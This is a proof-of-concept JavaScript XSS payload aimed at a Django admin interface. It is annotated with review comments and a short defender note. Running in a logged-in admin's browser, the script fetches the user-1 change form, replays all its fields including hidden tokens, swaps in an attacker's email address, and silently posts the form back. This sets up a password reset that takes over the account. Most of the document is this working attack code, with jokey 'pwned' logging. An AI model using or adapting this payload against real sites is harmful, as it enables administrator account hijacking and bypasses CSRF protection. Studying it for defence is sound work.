#poc #django #js #vulnerability
/*
 * POC for XSS vulnerability
 *
 * Simply parse the change form for the admin user and change the email.
 * After this has run successfully, the attacker needs to reset the password using
 * the email indicated in the script.
 */
// NOTE(review): assigned without const/let, so all three become implicit globals;
// the same pattern (opts, response, $element, ...) is used throughout this script.
// Presumably the Django admin change form for the user with pk 1 — inferred from
// the path, not shown here.
url = '/auth/user/1/change/'
// Not referenced anywhere in the visible code.
url_reset_passwd = '/password_change/'
// The address written into the form's email field. The bracketed literal looks
// like the hosting site's e-mail obfuscation rather than the original value — TODO confirm.
evil_email = '[email protected]'
// get the values | |
// jQuery .each() callback: `this` is the current <input> element, `idx` its
// position in the selection (unused). Copies the element's name -> value pair
// into the global `opts` object, so every field of the form — including any
// hidden inputs it carries — is replayed unchanged. Logs the field name only.
function get_default(idx) {
$element = $(this);
attrname = $element.attr('name');
value = $element.val();
opts[attrname] = value;
console.log(attrname);
}
// get the editing page | |
// Issue a GET for the change form from within the current browser session; jQuery
// hands the response body to pwn() on success. `response` receives the object
// returned by $.ajax (the request handle), not the page contents. No error
// handler is attached, so a failed request is silent. `testStatus` (sic, jQuery
// calls it textStatus) and `xhr` are unused.
response = $.ajax(url, {
success: function (data, testStatus, xhr){
pwn(data);
}
})
// this is called when the GET returns with success | |
// Called with the HTML of the change form. Parses it, takes the second <form>
// (index 1) in the document, copies every <input> into `opts`, overwrites the
// email field and POSTs the result back to the same URL.
// Defender note: this runs inside the victim's own origin and session, so the
// server receives an ordinary authenticated form submission and same-origin
// request checks (e.g. a CSRF token) cannot distinguish it. The control point is
// the injection itself — output encoding at the vulnerable template plus a
// restrictive CSP — and sensitive profile changes such as a new e-mail address
// should require out-of-band confirmation so that a silent change is detectable.
function pwn(response) {
$response = $(response)
// Index 1 assumes the page contains at least two forms — inferred, verify against the markup.
$form = $($response.find('form')[1])
console.log($form);
// fields for POSTing
opts = {}
// with a JQuery magic get the default value
$form.find('input').each(get_default)
// i'm twelve, what's this?
opts['email'] = evil_email;
console.log(opts)
// ??? profit
// Fire-and-forget: no success/error handler is attached, so the log line below
// runs before the POST completes and does not mean the request succeeded.
$.post(url, opts)
console.log(' [+] pwned')
}